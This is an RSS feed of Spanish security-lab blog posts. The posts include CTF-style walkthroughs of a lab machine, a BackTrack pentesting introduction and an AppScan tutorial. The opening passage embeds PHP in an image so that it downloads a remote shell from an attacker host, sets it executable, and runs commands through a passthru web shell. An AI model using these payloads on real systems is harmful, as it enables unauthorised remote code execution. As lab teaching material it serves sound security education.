<p>Como vemos, el contenido de la instrucción phpinfo() se muestra a continuación de los datos contenidos en la imagen. Esta información puede ser poco relevante, pero para la explotación efectiva únicamente hay que construir un exploit ligeramente más elaborado, que bien pudiera ser el que vamos a comentar a continuación.</p>
<p>El objetivo del exploit es conseguir crear una shell en PHP dentro de esta máquina. Para ello, el código que proponemos incluir dentro de la imagen es el siguiente:</p>
<p><strong>&lt;? copy(“http://ip/shell.txt”,”shell.php”); ?&gt;</strong></p>
<p>Vaya por delante que la explotación se puede realizar de muchas maneras. Nosotros por elegancia, siempre proponemos que el código a incluir en el exploit sea mínimo. En este caso, el exploit únicamente copia una shell remota localizada en shell.txt al servidor victima.</p>
<p>El contenido de shell.txt puede ser el siguiente:</p>
<p><strong>&lt;?<br />
header(“Content-Type: text/plain”);<br />
passthru($_GET[“cmd”);<br />
?&gt;</strong></p>
<p>El objetivo de este script es ejecutar el comando que pasemos como parámetr en la variable &#8220;cmd&#8221;. De tal forma, si ahora subimos la imagen con el primer código al servidor, y colocamos en la IP de un servidor web que usemos para el ataque el fichero “shell.txt”, debemos conseguir que este se copie al servidor y acceder a él desde la dirección http://www.blindware.inc/_controlp/shell.php</p>
<p>Aquí aparece un problema. Al acceder a esa URL veremos que no aparece nada, y es que hay un detalle importante siempre que subamos contenido ejecutable a un servidor. A priori no sabemos qué permisos serán necesarios para su ejecución, y la función copy lo más probable es que haya creado un fichero con permisos 644. Para ello podemos verificar qué permisos tienen los ficheros php de los que conocemos su existencia. En este caso los ficheros deben tener permisos 755. Por ello tenemos que modificar ligeramente el exploit a incluir dentro del fichero PNG al siguiente:</p>
<p><strong>&lt;? copy(“http://ip/shell.txt”,”shell.php”); chmod(“shell.php”,0755); ?&gt;</strong></p>
<p><strong>Nota:</strong> importante colocar un 0 delante del 755, sino no conseguiremos los permisos rwxr-xr-x</p>
<p>Hecho esto, tendremos acceso al sistema de forma remota y habremos superado el nivel, como muestran las siguientes URLs:</p>
<p><strong>http://www.blindware.inc/_controlp/shell.php?cmd=uname%20-a<br />
Linux sauron 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686 i686 i386 GNU/Linux</strong></p>
<p><strong>http://www.blindware.inc/_controlp/shell.php?cmd=id<br />
uid=500(blindware) gid=500(blindware) groups=500(blindware)</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-v-de-viii/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Test de Penetración con BackTrack, Introducción</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-introduccion</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-introduccion#comments</comments>
		<pubDate>Wed, 20 Aug 2008 16:33:40 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Ataques]]></category>
		<category><![CDATA[Distribución]]></category>
		<category><![CDATA[Escaneo]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[LiveCD]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Sniffing]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=203</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Antes de comenzar con este nuevo recurso y que irá en paralelo con otros laboratorios en desarrollo (<a href="http://labs.dragonjar.org/category/hacking" target="_blank">Laboratorios- Hacking, Técnicas y contramedidas</a>, <a href="http://labs.dragonjar.org/category/hacktaller" target="_blank">DragoNLab-HackTaller</a> y <a href="http://labs.dragonjar.org/category/criptografia" target="_blank">Taller Técnicas Criptográficas</a>), es necesarios aclarar algunos conceptos sobre el mismo.<br />
No sería posible comenzar sin aclarar la finalidad de este laboratorio práctico, las herramientas necesarias y la terminología a utilizar.</p>
<p style="text-align: justify;">Comencemos entonces por definir los conceptos de <strong>Test de Penetración</strong> y <strong>BackTrack</strong>:</p>
<p style="text-align: justify;"><span id="more-203"></span><strong>Test de penetración:</strong><br />
Test de Penetración, también llamado a veces “hacking ético” es una evaluación activa de las medidas de seguridad de la información.<br />
En los entornos de red complejos actuales, la exposición potencial al riesgo es cada vez mayor y securizar los sistemas se convierten en un auténtico reto.<br />
A través del Test de Penetración es posible detectar el nivel de Seguridad Interna y Externa de los Sistemas de Información de la empresa, determinando el grado de acceso que tendría un atacante con intenciones maliciosas. Además, el servicio chequea las vulnerabilidades que pueden ser vistas y explotadas por individuos no autorizados, &#8220;crackers&#8221;, agentes de información, ladrones, antiguos empleados, competidores, etc.</p>
<p style="text-align: justify;"><strong>Los servicios de Test de Penetración permiten:</strong><br />
<strong>-</strong> Evaluar vulnerabilidades por medio de la identificación de debilidades de configuración que puedan ser explotadas.<br />
<strong>-</strong> Analizar y categorizar las debilidades explotables basadas en el impacto potencial y posibilidad de ocurrencia.<br />
<strong>-</strong> Proveer recomendaciones prioritizadas para mitigar y eliminar las debilidades.</p>
<p style="text-align: justify;">El Test de Penetración está dirigido a la búsqueda de agujeros de seguridad de forma focalizada en uno o varios recursos críticos, como puede ser el firewall o el servidor Web.</p>
<p style="text-align: justify;"><strong>BackTrack:</strong><br />
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.<br />
Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.<br />
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.<br />
Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.<br />
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org<br />
<a href="http://www.remote-exploit.org/backtrack.html" target="_blank"><strong>Web Oficial de BackTrack</strong></a></p>
<p style="text-align: justify;">Luego de tener claro las anteriores definiciones podemos entender que la finalidad de nuestro Laboratorio de Test de Penetración con BackTrack, será el ofrecer las técnicas, procesos y procedimientos necesarios para llevar a cabo un Test de Penetración haciendo uso de la Multi-Herramienta BackTrack.</p>
<p style="text-align: justify;">Esto conllevará entonces a aprender y prácticar con ejemplos claros, sobre el uso de esta máginifica distribución. Además de las metodologías necesarias en un Test de Penetración.</p>
<p style="text-align: justify;"><strong>Palabras clave:</strong> <a href="http://es.wikipedia.org/wiki/BackTrack" target="_blank">BackTrack</a>, <a href="http://elladodelmal.blogspot.com/2007/02/test-de-intrusion-i-de-vi.html" target="_blank">Test de Penetración</a>, <a href="http://es.wikipedia.org/wiki/Distribuci%C3%B3n_Linux" target="_blank">Distribución</a>, <a href="http://es.wikipedia.org/wiki/CD_aut%C3%B3nomo" target="_blank">LiveCD</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">scanner de puertos</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a>, <a href="http://es.wikipedia.org/wiki/Exploit" target="_blank">exploits</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-sniffing-i" target="_blank">sniffers</a>, <a href="http://www.microsoft.com/spain/empresas/legal/forensic.mspx" target="_blank">análisis forense</a>, <a href="http://es.wikipedia.org/wiki/Comunicaci%C3%B3n_inal%C3%A1mbrica" target="_blank">Wireless</a>.</p>
<p style="text-align: justify;">En el próximo Laboratorio, definiré los recursos necesarios y el contenido temático del Laboratorio.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-introduccion/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Solución del HackTaller 01 DragonJAR (II de VIII)</title>
		<link>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-ii-de-viii</link>
		<comments>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-ii-de-viii#comments</comments>
		<pubDate>Wed, 13 Aug 2008 18:36:33 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[Logs]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Puertos]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>
		<category><![CDATA[Wget]]></category>
		<category><![CDATA[Wikto]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=78</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continuamos con la segunda entrega de la solución del HackTaller 01 de la Comunidad DragonJAR en formato de video.</p>
<p style="text-align: justify;">Este video tutorial fué desarrollado haciendo uso del solucionario en texto número 1 publicado por<a href="http://www.sg6.es/labs/" target="_blank"> <strong>SG6 Labs</strong></a>:</p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/50821791/94bfa723/H_ack_Taller_DragonJAR_SECGAME_02.html" target="_blank"><strong>Descargar video tutorial de resolución del HackTaller 01 de la Comunidad DragonJAR</strong></a> (SecGame: Sauron)(password: www.dragonjar.org)</p>
<p style="text-align: justify;"><strong>Herramientas necesarias:</strong></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/50821894/ef891491/nc11nt.html" target="_blank">NetCat</a><br />
<a href="http://www.4shared.com/file/50822044/4681948a/nmap-465-setup.html" target="_blank">Nmap</a><br />
<a href="http://www.4shared.com/file/50822127/88100881/wikto_v202924-24997.html" target="_blank">Wikto</a><br />
<a href="http://www.4shared.com/file/50822071/1dc633c6/wgetwin-1_5_3_1-binary.html" target="_blank">Wget</a><br />
<a href="http://www.4shared.com/file/50825998/689fa5da/dotnetfx.html" target="_blank">.Net Framework 2.0</a></p>
<p style="text-align: justify;"><strong>Palabras claves (Documentos de interés, Definiciones):</strong></p>
<p style="text-align: justify;"><a href="http://es.wikipedia.org/wiki/Nmap" target="_blank">Nmap</a> &#8211; <a href="http://es.wikipedia.org/wiki/Netcat" target="_blank">NetCat</a> &#8211; <a href="http://www.baxware.com/wikto.htm" target="_blank">Wikto</a> &#8211; <a href="http://es.wikipedia.org/wiki/Wget" target="_blank">Wget</a> &#8211; <a href="http://es.wikipedia.org/wiki/.NET_Framework" target="_blank">.Net Framework</a> &#8211; <a href="http://es.wikipedia.org/wiki/ICMP" target="_blank">ICMP</a> &#8211; <a href="http://www.info-ip.net/ip/Clases-de-direcciones-IP.php" target="_blank">Clases de redes</a> &#8211; <a href="http://es.wikipedia.org/wiki/Ping" target="_blank">Ping</a> &#8211; <a href="http://es.wikipedia.org/wiki/Puerto_%28computaci%C3%B3n%29" target="_blank">Puertos</a> &#8211; <a href="http://es.wikipedia.org/wiki/Subred" target="_blank">Subred</a> &#8211; <a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">Escaneo</a> &#8211; <a href="http://es.wikipedia.org/wiki/Servidor_web" target="_blank">Servidor Web</a> &#8211; <a href="http://es.wikipedia.org/wiki/Apache_http_server" target="_blank">Apache</a> &#8211; <a href="http://es.wikipedia.org/wiki/.php" target="_blank">PHP</a> &#8211; <a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a> &#8211; <a href="http://es.wikipedia.org/wiki/JavaScript" target="_blank">JavaScript</a> &#8211; <a href="http://es.wikipedia.org/wiki/HTTP" target="_blank">HTTP</a> &#8211; <a href="http://www.webtaller.com/google/guia_robots.php" target="_blank">Robots.txt</a> &#8211; <a href="http://www.wikilearning.com/monografia/control_administracion_e_integridad_de_logs-que_es_un_log/3485-2" target="_blank">Logs</a></p>
<p style="text-align: justify;">En este primer nivel, que sirve como toma de contacto con el modelo de resolución, lo primero que haremos será marcar unos objetivos principales, que bien podrán servir tanto para afrontar este reto, como en general para el inicio de cualquier actividad que tenga como finalidad determinar posibles puntos de intrusión en un sistema.</p>
<p><span id="more-78"></span><strong>Los objetivos son los siguientes:</strong></p>
<ul style="text-align: justify;">
<li>Conocer la estructura del sistema y de la red</li>
<li>Conocer la estructura del aplicativo</li>
<li>Buscar ficheros por defecto con información sensible</li>
<li>Analizar la lógica del aplicativo</li>
<li>Determinar los posibles puntos de intrusión</li>
<li>Información sobre Red y Servicios</li>
</ul>
<p>Vamos a comenzar delimitando los sistemas presentes en la red de clase C 192.168.200.0/24 . Para hacerlo, usamos nmap con su modificador –sP ( ICMP Ping ), aunque bien se puede dar la circunstancia de existir sistemas que no contesten a tráfico ICMP.</p>
<p style="text-align: justify;"><strong>&gt; nmap -sP 192.168.200.1-254</strong></p>
<p><em>Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-05 18:51 Hora estandar romance<br />
Host 192.168.200.1 appears to be up.<br />
Host www.blindware.inc (192.168.200.2) appears to be up.<br />
MAC Address: 52:54:00:12:34:55 (QEMU virtual NIC)<br />
Nmap finished: 254 IP addresses (2 hosts up) scanned in 17.016 seconds</em></p>
<p>Por ello, una comprobación también es interesante es verificar directamente algunos puertos típicos, haciendo uso de tráfico TCP, sin usar comprobación previa por ICMP. Por ejemplo lo podemos hacer con el modificador –P0 –p 80, indicando así que no se envíe un “ping” previo, y que se compruebe el puerto 80/tcp.</p>
<p>En nuestro caso concreto, y dado que directamente parece que no existe ningún otro host activo en esa subred, escanearemos la IP 192.168.200.2. Podremos escanear por defecto, eliminando el modificador “-p”, algunos puertos concretos o escanearlos todos “-p 1-65535”. Un detalle importante que siempre debemos recordar es que cuando marcamos un escaneo –sS o –sT, o sin tipo, únicamente escaneamos puertos TCP, los puertos UDP deben escanearse con el modificador –sU. En nuestro caso este ha sido el resultado.</p>
<p><strong>&gt; nmap -P0 -sS -p 22,23,25,80,110,443,3306 192.168.200.2</strong></p>
<p><em>Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-05 19:02 Hora estßndar romance<br />
Interesting ports on www.blindware.inc (192.168.200.2):<br />
PORT STATE SERVICE<br />
22/tcp filtered ssh<br />
23/tcp filtered telnet<br />
25/tcp filtered smtp<br />
80/tcp open http<br />
110/tcp filtered pop3<br />
443/tcp open https<br />
3306/tcp filtered mysql<br />
MAC Address: 52:54:00:12:34:55 (QEMU virtual NIC)</em></p>
<p>Nmap finished: 1 IP address (1 host up) scanned in 0.360 seconds</p>
<p>De esta verificación obtenemos que existen 2 puertos abiertos en ese sistema: 80 y 443, en un principio coorrespondientes a tráfico http y https. Existe otro modificador que nos puede dar más información sobre estos puertos: –sV</p>
<p><strong>&gt; nmap -sV -p 80,443 192.168.200.2</strong></p>
<p><em>Starting Nmap 4.20 ( http://insecure.org ) at 2007-07-05 19:14 Hora estandar romance<br />
Interesting ports on www.blindware.inc (192.168.200.2):<br />
PORT STATE SERVICE VERSION<br />
80/tcp open http Apache httpd 2.2.4 ((Fedora))<br />
443/tcp open ssl OpenSSL<br />
MAC Address: 52:54:00:12:34:55 (QEMU virtual NIC)</em></p>
<p>Nmap finished: 1 IP address (1 host up) scanned in 6.719 seconds</p>
<p>Llegados a este punto, podemos decir que si bien podemos seguir haciendo un uso más intensivo de herramientas de red, para nuestros propósitos hemos conseguido establecer la existencia de un sistema activo en la subred determinada, el cual cuenta con 2 puertos TCP abiertos, sobre los que ofrece servicio http y https.</p>
<p><strong>Información sobre el Servidor Web</strong></p>
<p>¿Cuál es nuestro segundo objetivo? Como dijimos inicialmente, familiarizarnos con toda la estructura del aplicativo web. ¿Por qué? Primero, porque en el sistema activo para la subred 192.168.200.0/24, no parecen existir otro tipo de servicios. Además de ello, debemos tener muy presente, que en la actualidad y de forma mayoritaria, la inseguridad se ha ido desplazando desde los servicios y elementos de red, a las aplicaciones web sobre el servicio http/https. Por tanto, a pesar de que pudieran existir otros servicios, sobre el aplicativo web, siempre que exista, incidiremos con especial detalle.</p>
<p>Una conexión directa haciendo uso de netcat, y una petición al servicio web nos muestra la siguiente información:</p>
<p><strong>&gt; nc 192.168.200.2 80<br />
HEAD / HTTP/1.0</strong></p>
<p><em>HTTP/1.1 200 OK<br />
Date: Thu, 05 Jul 2007 19:20:20 GMT<br />
Server: Apache/2.2.4 (Fedora)<br />
X-Powered-By: PHP/5.1.6<br />
Connection: close<br />
Content-Type: text/html; charset=UTF-8</em></p>
<p>A todos los efectos, esto nos sirve para comprobar que se tratan de versiones actualizadas de Apache y de PHP y que por tanto, las vulnerabilidades existentes, como suele ser común, no residen en los servicios de red, sino que deberemos buscarlas dentro del aplicativo web.</p>
<p>Lo siguiente que debemos hacer es obtener información sobre el árbol web. Desde aquí recomendamos que el spidering ( nombre que comúnmente recibe esta técnica ) se realice sin usar aplicativos integrados en el navegador, pues algunos tienen la mala costumbre de interpretar código javascript pudiendo hacer que obviemos detalles importantes debido a la automatización del proceso. Wget o httrack son unas herramientas muy válidas para la tarea.</p>
<p><strong>&gt; wget -r http://www.blindware.inc</strong><br />
–19:28:15– http://www.blindware.inc/<br />
=&gt; `www.blindware.inc/index.html’<br />
Resolving www.blindware.inc… 192.168.200.2<br />
Connecting to www.blindware.inc|192.168.200.2|:80… connected.<br />
HTTP request sent, awaiting response… 200 OK<br />
Length: unspecified [text/html]</p>
<p>[ &lt;=&gt; ] 24 –.–K/s</p>
<p>19:28:15 (1.02 MB/s) &#8211; `www.blindware.inc/index.html’ saved [24]</p>
<p>Loading robots.txt; please ignore errors.<br />
–19:28:15– http://www.blindware.inc/robots.txt<br />
=&gt; `www.blindware.inc/robots.txt’<br />
Connecting to www.blindware.inc|192.168.200.2|:80… connected.<br />
HTTP request sent, awaiting response… 200 OK<br />
Length: 33 [text/plain]</p>
<p>100%[====================================&gt;] 33 –.–K/s</p>
<p>19:28:15 (1.12 MB/s) &#8211; `www.blindware.inc/robots.txt’ saved [33/33]</p>
<p>–19:28:15– http://www.blindware.inc/load.js<br />
=&gt; `www.blindware.inc/load.js’<br />
Connecting to www.blindware.inc|192.168.200.2|:80… connected.<br />
HTTP request sent, awaiting response… 200 OK<br />
Length: 76 [application/x-javascript]</p>
<p>100%[====================================&gt;] 76 –.–K/s</p>
<p>19:28:15 (2.30 MB/s) &#8211; `www.blindware.inc/load.js’ saved [76/76]</p>
<p>FINISHED –19:28:15–<br />
Downloaded: 133 bytes in 3 files</p>
<p>Ese es el resultado inicial para http://www.blindware.inc. Si lo repetimos sobre http://intranet.blindware.inc no obtendremos nada porque nos pide autenticación, y por el momento la desconocemos. Por último, si lo llevamos a cabo sobre el servicio HTTPS, https://www.blindware.inc o https://intranet.blindware.inc obtenemos un index.html en blanco.</p>
<p>De esto concluimos que, al menos, se están sirviendo 3 escenarios diferentes. Uno por HTTP para www.blindware.inc, otro por HTTP para intranet.blindware.inc y por último, lo que parece uno común por HTTPS que sirve un index.html en blanco.</p>
<p><strong>Vamos a verificar qué contienen los ficheros descargados:</strong></p>
<p><strong>&gt; type index.html</strong><br />
script src=”load.js”&gt;</p>
<p><strong>&gt; type load.js</strong><br />
// document.location.href=’data/0.html’<br />
Document.location.href=’web/0.html’;</p>
<p><strong>&gt; type robots.txt</strong><br />
User-agent: *<br />
Disallow: /data/</p>
<p>Como podemos comprobar desde el fichero index.html existe una llamada a un fichero con contenido javascript (load.js) el cual tiene como misión redirigir el tráfico hacia la web principal. Nos debemos percatar, que existe una línea comentada dentro de este fichero, la cual nos da información sobre una ruta diferente a la habitual data/0.html. Así mismo dentro del fichero robots.txt volvemos a encontrar una referencia a esta ruta. Si continuamos descargando contenidos desde web/0.html comprobamos que únicamente se descarga contenido estático en html.</p>
<p>Así que hasta el momento, y como conclusión, sabemos que existe una carpeta web/, la cual no parece contener nada reseñable, más que el contenido estático del site, y la carpeta data/, sobre la cual hablaremos más adelante.</p>
<p><strong>Vulnerabilidades y Ficheros Sensibles</strong></p>
<p>A continuación, debemos determinar ficheros, configuraciones, o posibles fallos conocidos en el servicio web. Para esta tarea existen numerosas aplicaciones, desde AppScan, a Nikto, o su port a Win32, Wikto. Nosotros vamos a utilizar este último, concretamente sus funciones destinadas a la exploración de contenido backend, cuya finalidad es extraer mediante una exploración por diccionario carpetas y ficheros ocultos, así como la propia utilidad Nikto, que nos escaneará la web buscando vulnerabilidades conocidas. Advertencia: El uso de herramientas automatizadas puede provocar falsos positivos, que debemos comprobar antes de emitir cualquier tipo de valoración.</p>
<p><strong>Los resultados de la ejecución de Wikto son los siguientes:</strong></p>
<p><strong>BackEnd</strong></p>
<p><strong>#Directories</strong><br />
www.blindware.inc/<br />
www.blindware.inc/cgi-bin/<br />
www.blindware.inc/data/<br />
www.blindware.inc/error/<br />
www.blindware.inc/data/stats/<br />
www.blindware.inc/error/include/<br />
<strong>#Indexable</strong><br />
www.blindware.inc/data/<br />
<strong>#Files</strong><br />
www.blindware.inc/index.php<br />
www.blindware.inc/robots.txt</p>
<p><strong>Nikto</strong></p>
<p>/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000<br />
/index.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42<br />
/index.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42<br />
/WS_FTP.LOG</p>
<p><strong>De esta información podemos obtener los siguientes datos relevantes:</strong></p>
<ul style="text-align: justify;">
<li>La existencia de un directorio /data/stats</li>
<li>La existencia de un fichero WS_FTP.LOG</li>
<li>La existencia de un fichero robots.txt</li>
<li>Información sobre PHP</li>
</ul>
<p style="text-align: justify;">Un paseo por la aplicación visible, podemos hacerlo con Paros por ejemplo, nos desvela que, a priori, los que vemos es un contenido pre-generado de forma estática y cuya única entrada de datos se encuentra en el formulario contacto. Podemos analizarlo, pero no vamos a encontrar ningún comportamiento anómalo, ya que si nos damos cuenta el campo “action” de ese formulario va en blanco. Esto nos debe hacer pensar, que en caso de existir partes vulnerables, no se encuentran accesibles al público directamente.</p>
<p>Como información adicional decir que muchos gestores de contenido, entre ellos los más robustos, generan el contenido de forma estática desde un aplicativo en backend, haciendo que la parte visible de la aplicación carezca, casi por completo, de contenido dinámico, y de entradas por parte del usuario. Existirán por el contrario, otros aplicativos, como foros, buscadores, o secciones de prensa, cuyo contenido utilice generación dinámica. En estos casos, deberemos probar la inclusión sobre sus parámetros de código SQL, código HTML, código PHP, etc. buscando un comportamiento extraño.</p>
<p><strong>Busqueda de un Punto de Intrusión</strong></p>
<p>Para buscar un punto de intrusión, debemos recopilar lo que sabemos hasta el momento, ordenar las ideas y tomar una decisión, que vaya por delante, no tiene porqué ser la correcta. Dicho de otra forma, todo lo realizado hasta el momento nos lleva a suposiciones plausibles, pero nada nos garantiza que estemos en lo cierto. Vamos a ver lo que sabemos:</p>
<p><strong>1. </strong>Existen 3 contenidos diferentes servidos por el servidor web<br />
<strong>1. </strong>http://www.blindware.inc ( En adelante www )<br />
<strong>2. </strong>http://intranet.blindware.inc ( En adelante intranet )<br />
<strong>3. </strong>https://www.blindware.inc y https://intranet.blindware.inc ( En adelante https )<br />
<strong>2. </strong>El contenido de https que podemos revisar con Wikto no parece contener nada.<br />
<strong>3. </strong>Intranet nos pide autenticación para acceder.<br />
<strong>4. </strong>En www conocemos que:<br />
<strong>1. </strong>Tanto por la información pública existente, como por Wikto, existen sendos directorios de nombre data/ y data/stats/<br />
<strong>2. </strong>Wikto nos revela la existencia del fichero WS_FTP.LOG</p>
<p><strong>Antes de continuar debemos revisar el fichero WS_FTP.LOG:</strong></p>
<p>2007.05.08 12:55 B C:\data\logs\index.php &lt;– hawking /htdocs/data/stats/index.php<br />
2007.05.08 12:55 B C:\data\logs\index.php &lt;– hawking /htdocs/data/stats/blnd0.log<br />
2007.05.08 12:55 B C:\data\logs\index.php &lt;– hawking /htdocs/data/stats/blnd1.log<br />
2007.05.08 12:55 B C:\data\logs\index.php &lt;– hawking /htdocs/data/stats/blnd2.log<br />
2007.05.08 12:55 B C:\data\logs\index.php &lt;– hawking /htdocs/data/stats/blnd3.log</p>
<p><strong>Con lo cual, parece que tenemos 2 opciones:</strong></p>
<p>1. Atacar la autenticación de intranet<br />
2. Intentar acceder en WWW a data/stats/ ( y a lo que parecen ser logs )</p>
<p>Aquí hay que decidir, en este caso, sobre intranet no sabemos absolutamente nada, mientras que sobre data/stats/ al menos sabemos que el día 8 de Mayo de 2007, contenía algún tipo de fichero de logs.</p>
<p>Evidentemente cada uno puede buscar lo que prefiera, y dónde prefiera, pero en este caso, los LOGS pueden resultar una información de vital interés pues pueden desvelarnos partes ocultas del aplicativo, y otras áreas de las que no tenemos conocimiento, así como usuarios con los que se accede a ellas ( si el acceso se hace autenticado mediante apache ) y otros muchos detalles.</p>
<p>Por el contrario, atacar directamente una autenticación de Apache, salvo que esté incorrectamente configurada, es algo bastante poco probable de llevar a buen fin, porque a priori, únicamente podremos atacar por fuerza bruta.</p>
<p>Con esto podemos concluir el primer nivel, habiendo visto las siguientes vulnerabilidades relativas a la “publicación de información sensible”:</p>
<ul style="text-align: justify;">
<li>En los comentarios del fichero “load.js” se filtra información</li>
<li>El fichero robots.txt mal facilita información relativa a áreas del aplicativo no públicas</li>
<li>Existen el WS_FTP.LOG conteniendo información sensible</li>
<li>El servidor Apache, está incorrectamente configurado, permite, mediante la opción INDEXES, la navegación por aquellos directorios que no contienen un fichero índice.</li>
</ul>
<p style="text-align: justify;">Así mismo tenemos un objetivo para iniciar nuestro ataque: el directorio data/stats/ terminando así el primer nivel de Sauron. Este primer nivel es igual para ambos niveles de complejidad.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/solucion-del-hacktaller-01-dragonjar-ii-de-viii/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Escaneo de vulnerabilidades VI</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-vi</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-vi#comments</comments>
		<pubDate>Wed, 13 Aug 2008 17:52:46 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Escaneo]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=67</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong>Recordemos antes la definición de escaneo de vulnerabilidades:</strong></p>
<p style="text-align: justify;">“Una vulnerabilidad en seguridad informática hace referencia a una debilidad en un sistema permitiendo a un atacante violar la confidencialidad, integridad, disponibilidad, control de acceso y consistencia del sistema o de sus datos y aplicaciones.” (<a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Continúa…</a>)</p>
<p style="text-align: justify;"><strong>Práctica 56 &#8211; Escaneo de vulnerabilidades Web con Rational AppScan &#8211; IBM (Watchfire)<br />
Herramienta: </strong><a href="http://www.ibm.com/developerworks/downloads/r/appscan/" target="_blank">IBM Rational AppScan &#8211; (Watchfire)</a><strong><br />
</strong><strong>Prerequisitos:</strong> Ninguno<strong><br />
</strong><strong>Contramedidas: </strong><a href="http://es.wikipedia.org/wiki/Firewall" target="_blank">Firewalls</a>, seguridad en las listas de control de acceso (<a href="http://en.wikipedia.org/wiki/Access_control_list" target="_blank">ACLs</a>), <a href="http://www.securitysoftwarezone.com/how-bastion-hosts-work-review136-7.html" target="_blank">Bastion</a> Servers/Workstation (Hardening)<strong><br />
</strong><strong>Descripción: </strong>IBM Rational AppScan identifica, valida e informa vulnerabilidades de seguridad de aplicaciones y, con esta nueva versión, introduce nuevas funcionalidades y métodos de reporte para los auditores de seguridad, permitiendo que un conjunto más amplio de roles de TI participen e impulsen las pruebas de seguridad de las aplicaciones web críticas.</p>
<p style="text-align: justify;"><span id="more-67"></span>Se puede auditar una web presentando los informes (en distintos formatos) con los fallos de seguridad encontrados y posibles soluciones, por ejemplo: comprueba si la web cumple los requisitos de seguridad solictados por 4b, visa, etc., y sobre estos errores nos ofrece algunas recomendaciones que podemos aplicar para solucionarlo.</p>
<p>Soporta JavaScript, Flash, Ajax, Bases de Datos, PHP, ASP y casi todo lo que nos podamos imaginar. El producto cuenta con actualizaciones, con los test a nuevos ataques.</p>
<p>Si el sitio auditado tiene alguna zona restringida, tenemos una herramienta de explorador manual con la que facilitamos los datos de acceso a la zona en cuestión.</p>
<p>Las recomendacion para este producto es usarlo desde el momento de la construcción del sitio web.</p>
<p style="text-align: justify;">Veamos:</p>
<p><a href="http://img257.imageshack.us/img257/9603/29appscanaw8.jpg"><img src="http://img257.imageshack.us/img257/9603/29appscanaw8.th.jpg" alt="" /></a></p>
<p>Una vez adquirido el software procedemos a instalarlo</p>
<p><a href="http://img505.imageshack.us/img505/1813/1appscan1vy7.jpg"><img src="http://img505.imageshack.us/img505/1813/1appscan1vy7.th.jpg" alt="" /></a></p>
